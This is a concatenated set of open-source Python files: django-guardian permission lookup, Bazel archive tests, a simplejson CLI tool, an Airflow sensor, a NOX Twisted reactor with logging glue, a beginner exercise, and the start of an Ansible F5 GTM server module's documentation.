If ``klass`` parameter is not given, those should be full permission
names rather than only codenames (i.e. ``auth.change_user``). If more than
one permission is present within sequence, their content type **must** be
the same or ``MixedContentTypeError`` exception would be raised.
:param klass: may be a Model, Manager or QuerySet object. If not given
this parameter would be computed based on given ``params``.
:param any_perm: if True, any of permission in sequence is accepted
:raises MixedContentTypeError: when computed content type for ``perms``
and/or ``klass`` clashes.
:raises WrongAppError: if cannot compute app label for given ``perms``/
``klass``.
Example:
Let's assume we have a ``Task`` model belonging to the ``tasker`` app with
the default add_task, change_task and delete_task permissions provided
by Django::
>>> from guardian.shortcuts import get_objects_for_group
>>> from tasker import Task
>>> group = Group.objects.create('some group')
>>> task = Task.objects.create('some task')
>>> get_objects_for_group(group, 'tasker.add_task')
[]
>>> from guardian.shortcuts import assign
>>> assign('tasker.add_task', group, task)
>>> get_objects_for_group(group, 'tasker.add_task')
[<Task some task>]
The permission string can also be an iterable. Continuing with the previous example:
>>> get_objects_for_group(group, ['tasker.add_task', 'tasker.delete_task'])
[]
>>> assign('tasker.delete_task', group, task)
>>> get_objects_for_group(group, ['tasker.add_task', 'tasker.delete_task'])
[<Task some task>]
"""
if isinstance(perms, basestring):
perms = [perms]
ctype = None
app_label = None
codenames = set()
# Compute codenames set and ctype if possible
for perm in perms:
if '.' in perm:
new_app_label, codename = perm.split('.', 1)
if app_label is not None and app_label != new_app_label:
raise MixedContentTypeError("Given perms must have same app "
"label (%s != %s)" % (app_label, new_app_label))
else:
app_label = new_app_label
else:
codename = perm
codenames.add(codename)
if app_label is not None:
new_ctype = ContentType.objects.get(app_label=app_label,
permission__codename=codename)
if ctype is not None and ctype != new_ctype:
raise MixedContentTypeError("ContentType was once computed "
"to be %s and another one %s" % (ctype, new_ctype))
else:
ctype = new_ctype
# Compute queryset and ctype if still missing
if ctype is None and klass is None:
raise WrongAppError("Cannot determine content type")
elif ctype is None and klass is not None:
queryset = _get_queryset(klass)
ctype = ContentType.objects.get_for_model(queryset.model)
elif ctype is not None and klass is None:
queryset = _get_queryset(ctype.model_class())
else:
queryset = _get_queryset(klass)
if ctype.model_class() != queryset.model:
raise MixedContentTypeError("Content type for given perms and "
"klass differs")
# At this point, we should have both ctype and queryset and they should
# match which means: ctype.model_class() == queryset.model
# we should also have ``codenames`` list
# Now we should extract list of pk values for which we would filter queryset
groups_obj_perms = GroupObjectPermission.objects\
.filter(group=group)\
.filter(permission__content_type=ctype)\
.filter(permission__codename__in=codenames)\
.values_list('object_pk', 'permission__codename')
data = list(groups_obj_perms)
keyfunc = lambda t: t[0] # sorting/grouping by pk (first in result tuple)
data = sorted(data, key=keyfunc)
pk_list = []
for pk, group in groupby(data, keyfunc):
obj_codenames = set((e[1] for e in group))
if any_perm or codenames.issubset(obj_codenames):
pk_list.append(pk)
objects = queryset.filter(pk__in=pk_list)
return objects
|
snnn/bazel | refs/heads/master | tools/build_defs/pkg/archive_test.py | 24 | # Copyright 2015 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Testing for archive."""
import os
import os.path
import tarfile
import unittest
from tools.build_defs.pkg import archive
from tools.build_defs.pkg import testenv
class SimpleArFileTest(unittest.TestCase):
"""Testing for SimpleArFile class."""
def assertArFileContent(self, arfile, content):
"""Assert that arfile contains exactly the entry described by `content`.
Args:
arfile: the path to the AR file to test.
content: an array describing the expected content of the AR file.
Each entry in that list should be a dictionary where each field
is a field to test in the corresponding SimpleArFileEntry. For
testing the presence of a file "x", then the entry could simply
be `{"filename": "x"}`, the missing field will be ignored.
"""
with archive.SimpleArFile(arfile) as f:
current = f.next()
i = 0
while current:
error_msg = "Extraneous file at end of archive %s: %s" % (
arfile,
current.filename
)
self.assertTrue(i < len(content), error_msg)
for k, v in content[i].items():
value = getattr(current, k)
error_msg = " ".join([
"Value `%s` for key `%s` of file" % (value, k),
"%s in archive %s does" % (current.filename, arfile),
"not match expected value `%s`" % v
])
self.assertEqual(value, v, error_msg)
current = f.next()
i += 1
if i < len(content):
self.fail("Missing file %s in archive %s" % (content[i], arfile))
def testEmptyArFile(self):
self.assertArFileContent(os.path.join(testenv.TESTDATA_PATH, "empty.ar"),
[])
def assertSimpleFileContent(self, names):
datafile = os.path.join(testenv.TESTDATA_PATH, "_".join(names) + ".ar")
content = [{"filename": n, "size": len(n), "data": n} for n in names]
self.assertArFileContent(datafile, content)
def testAFile(self):
self.assertSimpleFileContent(["a"])
def testBFile(self):
self.assertSimpleFileContent(["b"])
def testABFile(self):
self.assertSimpleFileContent(["ab"])
def testA_BFile(self):
self.assertSimpleFileContent(["a", "b"])
def testA_ABFile(self):
self.assertSimpleFileContent(["a", "ab"])
def testA_B_ABFile(self):
self.assertSimpleFileContent(["a", "b", "ab"])
class TarFileWriterTest(unittest.TestCase):
"""Testing for TarFileWriter class."""
def assertTarFileContent(self, tar, content):
"""Assert that tarfile contains exactly the entry described by `content`.
Args:
tar: the path to the TAR file to test.
content: an array describing the expected content of the TAR file.
Each entry in that list should be a dictionary where each field
is a field to test in the corresponding TarInfo. For
testing the presence of a file "x", then the entry could simply
be `{"name": "x"}`, the missing field will be ignored. To match
the content of a file entry, use the key "data".
"""
with tarfile.open(tar, "r:") as f:
i = 0
for current in f:
error_msg = "Extraneous file at end of archive %s: %s" % (
tar,
current.name
)
self.assertTrue(i < len(content), error_msg)
for k, v in content[i].items():
if k == "data":
value = f.extractfile(current).read()
else:
value = getattr(current, k)
error_msg = " ".join([
"Value `%s` for key `%s` of file" % (value, k),
"%s in archive %s does" % (current.name, tar),
"not match expected value `%s`" % v
])
self.assertEqual(value, v, error_msg)
i += 1
if i < len(content):
self.fail("Missing file %s in archive %s" % (content[i], tar))
def setUp(self):
self.tempfile = os.path.join(os.environ["TEST_TMPDIR"], "test.tar")
def tearDown(self):
if os.path.exists(self.tempfile):
os.remove(self.tempfile)
def testEmptyTarFile(self):
with archive.TarFileWriter(self.tempfile):
pass
self.assertTarFileContent(self.tempfile, [])
def assertSimpleFileContent(self, names):
with archive.TarFileWriter(self.tempfile) as f:
for n in names:
f.add_file(n, content=n)
content = ([{"name": "."}] + [{"name": n,
"size": len(n),
"data": n} for n in names])
self.assertTarFileContent(self.tempfile, content)
def testAddFile(self):
self.assertSimpleFileContent(["./a"])
self.assertSimpleFileContent(["./b"])
self.assertSimpleFileContent(["./ab"])
self.assertSimpleFileContent(["./a", "./b"])
self.assertSimpleFileContent(["./a", "./ab"])
self.assertSimpleFileContent(["./a", "./b", "./ab"])
def testDottedFiles(self):
with archive.TarFileWriter(self.tempfile) as f:
f.add_file("a")
f.add_file("/b")
f.add_file("./c")
f.add_file("./.d")
f.add_file("..e")
f.add_file(".f")
content = [
{"name": "."}, {"name": "./a"}, {"name": "/b"}, {"name": "./c"},
{"name": "./.d"}, {"name": "./..e"}, {"name": "./.f"}
]
self.assertTarFileContent(self.tempfile, content)
def testAddDir(self):
# For some strange reason, ending slash is stripped by the test
content = [
{"name": ".", "mode": 0o755},
{"name": "./a", "mode": 0o755},
{"name": "./a/b", "data": "ab", "mode": 0o644},
{"name": "./a/c", "mode": 0o755},
{"name": "./a/c/d", "data": "acd", "mode": 0o644},
]
tempdir = os.path.join(os.environ["TEST_TMPDIR"], "test_dir")
# Iterate over the `content` array to create the directory
# structure it describes.
for c in content:
if "data" in c:
p = os.path.join(tempdir, c["name"][2:])
os.makedirs(os.path.dirname(p))
with open(p, "w") as f:
f.write(c["data"])
with archive.TarFileWriter(self.tempfile) as f:
f.add_dir("./", tempdir, mode=0o644)
self.assertTarFileContent(self.tempfile, content)
def testMergeTar(self):
content = [
{"name": "./a", "data": "a"},
{"name": "./ab", "data": "ab"},
]
for ext in ["", ".gz", ".bz2", ".xz"]:
with archive.TarFileWriter(self.tempfile) as f:
f.add_tar(os.path.join(testenv.TESTDATA_PATH, "tar_test.tar" + ext),
name_filter=lambda n: n != "./b")
self.assertTarFileContent(self.tempfile, content)
def testMergeTarRelocated(self):
content = [
{"name": ".", "mode": 0o755},
{"name": "./foo", "mode": 0o755},
{"name": "./foo/a", "data": "a"},
{"name": "./foo/ab", "data": "ab"},
]
with archive.TarFileWriter(self.tempfile) as f:
f.add_tar(os.path.join(testenv.TESTDATA_PATH, "tar_test.tar"),
name_filter=lambda n: n != "./b", root="/foo")
self.assertTarFileContent(self.tempfile, content)
def testAddingDirectoriesForFile(self):
with archive.TarFileWriter(self.tempfile) as f:
f.add_file("d/f")
content = [
{"name": ".",
"mode": 0o755},
{"name": "./d",
"mode": 0o755},
{"name": "./d/f"},
]
self.assertTarFileContent(self.tempfile, content)
def testAddingDirectoriesForFileSeparately(self):
d_dir = os.path.join(os.environ["TEST_TMPDIR"], "d_dir")
os.makedirs(d_dir)
with open(os.path.join(d_dir, "dir_file"), "w"):
pass
a_dir = os.path.join(os.environ["TEST_TMPDIR"], "a_dir")
os.makedirs(a_dir)
with open(os.path.join(a_dir, "dir_file"), "w"):
pass
with archive.TarFileWriter(self.tempfile) as f:
f.add_dir("d", d_dir)
f.add_file("d/f")
f.add_dir("a", a_dir)
f.add_file("a/b/f")
content = [
{"name": ".",
"mode": 0o755},
{"name": "./d",
"mode": 0o755},
{"name": "./d/dir_file"},
{"name": "./d/f"},
{"name": "./a",
"mode": 0o755},
{"name": "./a/dir_file"},
{"name": "./a/b",
"mode": 0o755},
{"name": "./a/b/f"},
]
self.assertTarFileContent(self.tempfile, content)
def testAddingDirectoriesForFileManually(self):
with archive.TarFileWriter(self.tempfile) as f:
f.add_file("d", tarfile.DIRTYPE)
f.add_file("d/f")
f.add_file("a", tarfile.DIRTYPE)
f.add_file("a/b", tarfile.DIRTYPE)
f.add_file("a/b", tarfile.DIRTYPE)
f.add_file("a/b/", tarfile.DIRTYPE)
f.add_file("a/b/c/f")
f.add_file("x/y/f")
f.add_file("x", tarfile.DIRTYPE)
content = [
{"name": ".",
"mode": 0o755},
{"name": "./d",
"mode": 0o755},
{"name": "./d/f"},
{"name": "./a",
"mode": 0o755},
{"name": "./a/b",
"mode": 0o755},
{"name": "./a/b/c",
"mode": 0o755},
{"name": "./a/b/c/f"},
{"name": "./x",
"mode": 0o755},
{"name": "./x/y",
"mode": 0o755},
{"name": "./x/y/f"},
]
self.assertTarFileContent(self.tempfile, content)
if __name__ == "__main__":
unittest.main()
|
salomon1184/bite-project | refs/heads/master | deps/mrtaskman/server/mapreduce/lib/pipeline/simplejson/tool.py | 43 | #!/usr/bin/env python
r"""Command-line tool to validate and pretty-print JSON
Usage::
$ echo '{"json":"obj"}' | python -m simplejson.tool
{
"json": "obj"
}
$ echo '{ 1.2:3.4}' | python -m simplejson.tool
Expecting property name: line 1 column 2 (char 2)
"""
import sys
from mapreduce.lib import simplejson as json
def main():
if len(sys.argv) == 1:
infile = sys.stdin
outfile = sys.stdout
elif len(sys.argv) == 2:
infile = open(sys.argv[1], 'rb')
outfile = sys.stdout
elif len(sys.argv) == 3:
infile = open(sys.argv[1], 'rb')
outfile = open(sys.argv[2], 'wb')
else:
raise SystemExit(sys.argv[0] + " [infile [outfile]]")
try:
obj = json.load(infile,
object_pairs_hook=json.OrderedDict,
use_decimal=True)
except ValueError, e:
raise SystemExit(e)
json.dump(obj, outfile, sort_keys=True, indent=' ', use_decimal=True)
outfile.write('\n')
if __name__ == '__main__':
main()
|
sekikn/incubator-airflow | refs/heads/master | airflow/sensors/python.py | 5 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import Callable, Dict, List, Optional
from airflow.sensors.base import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
from airflow.utils.operator_helpers import determine_kwargs
class PythonSensor(BaseSensorOperator):
"""
Waits for a Python callable to return True.
User could put input argument in templates_dict
e.g ``templates_dict = {'start_ds': 1970}``
and access the argument by calling ``kwargs['templates_dict']['start_ds']``
in the callable
:param python_callable: A reference to an object that is callable
:type python_callable: python callable
:param op_kwargs: a dictionary of keyword arguments that will get unpacked
in your function
:type op_kwargs: dict
:param op_args: a list of positional arguments that will get unpacked when
calling your callable
:type op_args: list
:param templates_dict: a dictionary where the values are templates that
will get templated by the Airflow engine sometime between
``__init__`` and ``execute`` takes place and are made available
in your callable's context after the template has been applied.
:type templates_dict: dict of str
"""
template_fields = ('templates_dict', 'op_args', 'op_kwargs')
@apply_defaults
def __init__(
self,
*,
python_callable: Callable,
op_args: Optional[List] = None,
op_kwargs: Optional[Dict] = None,
templates_dict: Optional[Dict] = None,
**kwargs,
):
super().__init__(**kwargs)
self.python_callable = python_callable
self.op_args = op_args or []
self.op_kwargs = op_kwargs or {}
self.templates_dict = templates_dict
def poke(self, context: Dict):
context.update(self.op_kwargs)
context['templates_dict'] = self.templates_dict
self.op_kwargs = determine_kwargs(self.python_callable, self.op_args, context)
self.log.info("Poking callable: %s", str(self.python_callable))
return_value = self.python_callable(*self.op_args, **self.op_kwargs)
return bool(return_value)
|
bigswitch/snac-nox-zaku | refs/heads/zaku | src/nox/coreapps/pyrt/pyoxidereactor.py | 3 | # Copyright 2008 (C) Nicira, Inc.
#
# This file is part of NOX.
#
# NOX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# NOX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NOX. If not, see <http://www.gnu.org/licenses/>.
#
# Reactor for plugging twisted into the vigil main loop. Uses
# oxidereactorglue under the covers to register fildescriptors.
#
import signal
import nox.lib.core
import oxidereactor
import twisted
import logging, types
from twisted.internet import base, error, interfaces, posixbase, task
from twisted.internet.interfaces import IResolverSimple
from twisted.internet.process import reapAllProcesses
from twisted.python.runtime import seconds
from twisted.python import log, reflect
from zope.interface import implements
def doRead(reader, reactor):
why = None
why = reader.doRead()
if why:
twisted.internet.reactor._disconnectSelectable(reader, why, 1)
reactor.callPendingThreadCalls()
def doWrite(writer, reactor):
why = None
why = writer.doWrite()
if why:
twisted.internet.reactor._disconnectSelectable(writer, why, 0)
reactor.callPendingThreadCalls()
class DelayedCallWrapper(base.DelayedCall):
def __init__(self, delay, func, args, kw):
base.DelayedCall.__init__(self, delay, func, args, kw, None, None)
self.dc = oxidereactor.delayedcall()
def delay(self, secondsLater):
if self.cancelled:
raise error.AlreadyCancelled
elif self.called:
raise error.AlreadyCalled
if secondsLater < 0:
self.dc.delay(True, long(-secondsLater),
long(-secondsLater * 1000 % 1000))
else:
self.dc.delay(False, long(secondsLater),
long(secondsLater * 1000 % 1000))
def reset(self, secondsFromNow):
if self.cancelled:
raise error.AlreadyCancelled
elif self.called:
raise error.AlreadyCalled
self.dc.reset(long(secondsFromNow),
long(secondsFromNow * 1000 % 1000))
def cancel(self):
if self.cancelled:
raise error.AlreadyCancelled
elif self.called:
raise error.AlreadyCalled
self.cancelled = 1
self.dc.cancel()
def __call__(self):
try:
self.called = 1
self.func(*self.args, **self.kw);
except:
log.deferr()
if hasattr(self, "creator"):
e = "\n"
e += " C: previous exception occurred in " + \
"a DelayedCall created here:\n"
e += " C:"
e += "".join(self.creator).rstrip().replace("\n","\n C:")
e += "\n"
log.msg(e)
class Resolver:
implements (IResolverSimple)
def __init__(self, oreactor):
self.oreactor = oreactor
def getHostByName(self, name, timeout = (1, 3, 11, 45)):
from twisted.internet.defer import Deferred
d = Deferred()
self.oreactor.resolve(name, d.callback)
def query_complete(address, name):
if address is None or address == "":
from twisted.internet import error
msg = "address %r not found" % (name,)
err = error.DNSLookupError(msg)
from twisted.internet import defer
return defer.fail(err)
else:
return address
return d.addCallback(query_complete, name)
class pyoxidereactor (posixbase.PosixReactorBase):
def __init__(self, ctxt):
from twisted.internet.main import installReactor
self.oreactor = oxidereactor.oxidereactor(ctxt, "oxidereactor")
posixbase.PosixReactorBase.__init__(self)
installReactor(self)
self.installResolver(Resolver(self.oreactor))
signal.signal(signal.SIGCHLD, self._handleSigchld)
# Twisted uses os.waitpid(pid, WNOHANG) but doesn't try again
# if the call returns nothing (since not being able to block).
# Poll once a second on behalf of Twisted core to detect child
# processes dying properly.
task.LoopingCall(reapAllProcesses).start(1)
# The removeReader, removeWriter, addReader, and addWriter
# functions must be implemented, because they are used extensively
# by Python code.
def removeReader(self, reader):
self.oreactor.removeReader(reader.fileno())
def removeWriter(self, writer):
self.oreactor.removeWriter(writer.fileno())
def addReader(self, reader):
self.oreactor.addReader(reader.fileno(), reader,
lambda reader: doRead(reader, self))
def addWriter(self, writer):
self.oreactor.addWriter(writer.fileno(), writer,
lambda writer: doWrite(writer, self))
# doIteration is called from PosixReactorBase.mainLoop
# which is called from PosixReactorBase.run
# and we never call either one.
# doIteration is also called from ReactorBase.iterate,
# which we never call.
# So it seems questionable whether we have to implement this.
# For now, stub it out.
def doIteration(self, delay=0):
raise NotImplementedError()
# stop is called from ReactorBase.sigInt,
# which is called upon receipt of SIGINT
# only if PosixReactorBase.startRunning is allowed to install
# signal handlers. It seems uncertain, at best, that we'll
# want Python to handle our signals.
def stop(self):
raise NotImplementedError()
# removeAll is called from ReactorBase.disconnectAll
# which is called indirectly from stop
# which we concluded above doesn't get called in our system.
# So there's no need to implement it.
def removeAll(self):
raise NotImplementedError()
# IReactorTime interface for timer management
def callLater(self, delay, f, *args, **kw):
if not callable(f):
raise TypeError("'f' object is not callable")
tple = DelayedCallWrapper(delay, f, args, kw)
self.oreactor.callLater(long(tple.getTime()),
long(tple.getTime() * 1000000 % 1000000),
tple);
return tple
def getDelayedCalls(self):
raise NotImplementedError()
# Calls to be invoked in the reactor thread
def callPendingThreadCalls(self):
if self.threadCallQueue:
count = 0
total = len(self.threadCallQueue)
for (f, a, kw) in self.threadCallQueue:
try:
f(*a, **kw)
except:
log.err()
count += 1
if count == total:
break
del self.threadCallQueue[:count]
if self.threadCallQueue:
if self.waker:
self.waker.wakeUp()
class vlog(log.FileLogObserver):
"""
Passes Twisted log messages to the C++ vlog.
"""
def __init__(self, v):
log.FileLogObserver.__init__(self, log.NullFile())
self.modules = {}
self.v = v
def __call__(self, event):
msg = event['message']
if not msg:
if event['isError'] and event.has_key('failure'):
msg = ((event.get('why') or 'Unhandled Error')
+ '\n' + event['failure'].getTraceback())
elif event.has_key('format'):
if hasattr(self, '_safeFormat'):
msg = self._safeFormat(event['format'], event)
else:
msg = log._safeFormat(event['format'], event)
else:
return
else:
msg = ' '.join(map(reflect.safe_str, msg))
try:
module = event['system']
# Initialize the vlog modules on-demand, since systems are
# not initialized explicitly in the Twisted logging API.
if not self.modules.has_key(module):
if module == '-':
module = 'reactor'
self.modules['-'] = self.v.mod_init(module)
self.modules[module] = self.modules['-']
else:
self.modules[module] = self.v.mod_init(module)
# vlog module identifier
module = self.modules[module]
fmt = {'system': module, 'msg': msg.replace("\n", "\n\t")}
if hasattr(self, '_safeFormat'):
msg = self._safeFormat("%(msg)s", fmt)
else:
msg = log._safeFormat("%(msg)s", fmt)
if event["isError"]:
self.v.err(module, msg)
else:
self.v.msg(module, msg)
except Exception, e:
# Can't pass an exception, since then the observer would
# be disabled automatically.
pass
v = oxidereactor.vigillog()
log.startLoggingWithObserver(vlog(v), 0)
class VigilLogger(logging.Logger):
"""
Stores the C++ logger identifier.
"""
def __init__(self, name):
logging.Logger.__init__(self, name)
self.vigil_logger_id = v.mod_init(name)
def isEnabledFor(self, level):
if level < logging.DEBUG:
return v.is_dbg_enabled(self.vigil_logger_id)
elif level < logging.INFO:
return v.is_dbg_enabled(self.vigil_logger_id)
elif level < logging.WARN:
return v.is_info_enabled(self.vigil_logger_id)
elif level < logging.ERROR:
return v.is_warn_enabled(self.vigil_logger_id)
elif level < logging.FATAL:
return v.is_err_enabled(self.vigil_logger_id)
else:
return v.is_emer_enabled(self.vigil_logger_id)
def makeRecord(self, name, level, fn, lno, msg, args, exc_info,
func=None, extra=None):
"""
Inject the vigil logger id into a standard Python log record.
"""
rv = logging.Logger.makeRecord(self, name, level, fn, lno, msg, args,
exc_info, func, extra)
rv.__dict__['vigil_logger_id'] = self.vigil_logger_id
return rv
class VigilHandler(logging.Handler):
"""
A Python logging handler class which writes logging records, with
minimal formatting, to the C++ logging infrastructure.
"""
def __init__(self):
"""
Initialize the handler.
"""
logging.Handler.__init__(self)
def emit(self, record):
"""
Emit a record.
"""
try:
vigil_logger_id = record.__dict__['vigil_logger_id']
msg = self.format(record)
if record.levelno < logging.DEBUG:
o = v.dbg
elif record.levelno < logging.INFO:
o = v.dbg
elif record.levelno < logging.WARN:
o = v.info
elif record.levelno < logging.ERROR:
o = v.warn
elif record.levelno < logging.FATAL:
o = v.err
else:
o = v.fatal
fs = "%s"
if not hasattr(types, "UnicodeType"): #if no unicode support...
o(vigil_logger_id, fs % msg)
else:
if isinstance(msg, str):
#caller may have passed us an encoded byte string...
msg = unicode(msg, 'utf-8')
msg = msg.encode('utf-8')
o(vigil_logger_id, fs % msg)
self.flush()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def config():
vigil_handler = VigilHandler()
fs = format='%(message)s'
dfs = None
fmt = logging.Formatter(fs, dfs)
vigil_handler.setFormatter(fmt)
logging.root.addHandler(vigil_handler)
logging.root.setLevel(logging.DEBUG)
config()
logging.setLoggerClass(VigilLogger)
def getFactory():
class Factory:
def instance(self, ctxt):
return pyoxidereactor(ctxt)
return Factory()
|
YaniLozanov/Software-University | refs/heads/master | Python/PyCharm/04.Complex Conditional Statements/01. Personal Titles.py | 1 | # Problem:
# The first task of this topic is to write a console program that introduces age (decimal number) and
# gender ("m" or "f") and prints an address from among the following:
# -> "Mr." - male (gender "m") aged 16 or over
# -> "Master" - boy (sex "m") under 16 years of age
# -> "Ms." - woman (gender "f") aged 16 or over
# -> "Miss" - girl (gender "f") under 16 years of age
age = float(input())
sex = input()
if sex == "m":
if age >= 16:
print("Mr.")
else:
print("Master")
else:
if age >= 16:
print("Ms.")
else:
print("Miss")
|
nitzmahone/ansible | refs/heads/devel | lib/ansible/modules/network/f5/bigip_gtm_server.py | 4 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2017, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_gtm_server
short_description: Manages F5 BIG-IP GTM servers
description:
- Manage BIG-IP server configuration. This module is able to manipulate the server
definitions in a BIG-IP.
version_added: 2.5
options:
name:
description:
- The name of the server.
required: True
state:
description:
- The server state. If C(absent), an attempt to delete the server will be made.
This will only succeed if this server is not in use by a virtual server.
C(present) creates the server and enables it. If C(enabled), enable the server
if it exists. If C(disabled), create the server if needed, and set state to
C(disabled).
default: present
choices:
- present
- absent
- enabled
- disabled
datacenter:
description:
- Data center the server belongs to. When creating a new GTM server, this value
is required.
devices:
description:
- Lists the self IP addresses and translations for each device. When creating a
new GTM server, this value is required. This list is a complex list that
specifies a number of keys.
- The C(name) key specifies a name for the device. The device name must
be unique per server. This key is required.
- The C(address) key contains an IP address, or list of IP addresses, for the
destination server. This key is required.
- The C(translation) key contains an IP address to translate the C(address)
value above to. This key is optional.
- Specifying duplicate C(name) fields is a supported means of providing device
addresses. In this scenario, the addresses will be assigned to the C(name)'s list
of addresses.
server_type:
description:
- Specifies the server type. The server type determines the metrics that the
system can collect from the server. When creating a new GTM server, the default
value C(bigip) is used.
choices:
- alteon-ace-director
- cisco-css
- cisco-server-load-balancer
- generic-host
- radware-wsd
- windows-nt-4.0
- bigip
- cisco-local-director-v2
- extreme
- generic-load-balancer
- sun-solaris
- cacheflow
- cisco-local-director-v3
- foundry-server-iron
- netapp
- windows-2000-server
aliases:
- product
link_discovery:
description:
- Specifies whether the system auto-discovers the links for this server. When
creating a new GTM server, if this parameter is not specified, the default
value C(disabled) is used.
- If you set this parameter to C(enabled) or C(enabled-no-delete), you must
also ensure that the C(virtual_server_discovery) parameter is also set to
C(enabled) or C(enabled-no-delete).
choices:
- enabled
- disabled
- enabled-no-delete
virtual_server_discovery:
description:
- Specifies whether the system auto-discovers the virtual servers for this server.
When creating a new GTM server, if this parameter is not specified, the default
value C(disabled) is used.
choices:
- enabled
- disabled
- enabled-no-delete
partition:
description:
- Device partition to manage resources on.
default: Common
version_added: 2.5
iquery_options:
description:
- Specifies whether the Global Traffic Manager uses this BIG-IP
system to conduct a variety of probes before delegating traffic to it.
suboptions:
allow_path:
description:
- Specifies that the system verifies the logical network route between a data
center server and a local DNS server.
type: bool
allow_service_check:
description:
- Specifies that the system verifies that an application on a server is running,
by remotely running the application using an external service checker program.
type: bool
allow_snmp:
description:
- Specifies that the system checks the performance of a server running an SNMP
agent.
type: bool
version_added: 2.7
monitors:
description:
- Specifies the health monitors that the system currently uses to monitor this resource.
- When C(availability_requirements.type) is C(require), you may only have a single monitor in the
C(monitors) list.
version_added: 2.8
availability_requirements:
description:
- Specifies, if you activate more than one health monitor, the number of health
monitors that must receive successful responses in order for the link to be
considered available.
suboptions:
type:
description:
- Monitor rule type when C(monitors) is specified.
- When creating a new pool, if this value is not specified, the default of 'all' will be used.
choices: ['all', 'at_least', 'require']
at_least:
description:
- Specifies the minimum number of active health monitors that must be successful
before the link is considered up.
- This parameter is only relevant when a C(type) of C(at_least) is used.
- This parameter will be ignored if a type of either C(all) or C(require) is used.
number_of_probes:
description:
- Specifies the minimum number of probes that must succeed for this server to be declared up.
- When creating a new virtual server, if this parameter is specified, then the C(number_of_probers)
parameter must also be specified.
- The value of this parameter should always be B(lower) than, or B(equal to), the value of C(number_of_probers).
- This parameter is only relevant when a C(type) of C(require) is used.
- This parameter will be ignored if a type of either C(all) or C(at_least) is used.
number_of_probers:
description:
- Specifies the number of probers that should be used when running probes.
- When creating a new virtual server, if this parameter is specified, then the C(number_of_probes)
parameter must also be specified.
- The value of this parameter should always be B(higher) than, or B(equal to), the value of C(number_of_probers).
- This parameter is only relevant when a C(type) of C(require) is used.
- This parameter will be ignored if a type of either C(all) or C(at_least) is used.
version_added: 2.8
prober_preference:
description:
- Specifies the type of prober to use to monitor this server's resources.
- This option is ignored in C(TMOS) version C(12.x).
- From C(TMOS) version C(13.x) and up, when prober_preference is set to C(pool)
a C(prober_pool) parameter must be specified.
choices:
- inside-datacenter
- outside-datacenter
- inherit
- pool
version_added: 2.8
prober_fallback:
description:
- Specifies the type of prober to use to monitor this server's resources
when the preferred prober is not available.
- This option is ignored in C(TMOS) version C(12.x).
- From C(TMOS) version C(13.x) and up, when prober_preference is set to C(pool)
a C(prober_pool) parameter must be specified.
- The choices are mutually exclusive with prober_preference parameter,
with the exception of C(any-available) or C(none) option.
choices:
- any
- inside-datacenter
- outside-datacenter
- inherit
- pool
- none
version_added: 2.8
prober_pool:
description:
- Specifies the name of the prober pool to use to monitor this server's resources.
- From C(TMOS) version C(13.x) and up, this parameter is mandatory when C(prober_preference) is set to C(pool).
- Format of the name can be either be prepended by partition (C(/Common/foo)), or specified
just as an object name (C(foo)).
- In C(TMOS) version C(12.x) prober_pool can be set to empty string to revert to default setting of inherit.
version_added: 2.8
limits:
description:
- Specifies resource thresholds or limit requirements at the pool member level.
- When you enable one or more limit settings, the system then uses that data to take
members in and out of service.
- You can define limits for any or all of the limit settings. However, when a
member does not meet the resource threshold limit requirement, the system marks
the member as unavailable and directs load-balancing traffic to another resource.
version_added: 2.8
suboptions:
bits_enabled:
description:
- Whether the bits limit it enabled or not.
- This parameter allows you to switch on or off the effect of the limit.
type: bool
packets_enabled:
description:
- Whether the packets limit it enabled or not.
- This parameter allows you to switch on or off the effect of the limit.
type: bool
connections_enabled:
description:
- Whether the current connections limit it enabled or not.
- This parameter allows you to switch on or off the effect of the limit.
type: bool
cpu_enabled:
description:
- Whether the CPU limit it enabled or not.
- This parameter allows you to switch on or off the effect of the limit.
type: bool
memory_enabled:
description:
- Whether the memory limit it enabled or not.
- This parameter allows you to switch on or off the effect of the limit.
type: bool
bits_limit:
description:
- Specifies the maximum allowable data throughput rate, in bits per second,
for the member.
- If the network traffic volume exceeds this limit, the system marks the
member as unavailable.
packets_limit:
description:
- Specifies the maximum allowable data transfer rate, in packets per second,
for the member.
- If the network traffic volume exceeds this limit, the system marks the
member as unavailable.
connections_limit:
description:
- Specifies the maximum number of concurrent connections, combined, for all of
the member.
- If the connections exceed this limit, the system marks the server as
unavailable.
cpu_limit:
description:
- Specifies the percent of CPU usage.
- If percent of CPU usage goes above the limit, the system marks the server as unavailable.
memory_limit:
description:
- Specifies the available memory required by the virtual servers on the server.
- If available memory falls below this limit, the system marks the server as unavailable.
extends_documentation_fragment: f5
author:
- Robert Teller (@r-teller)
- Tim Rupp (@caphrim007)
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
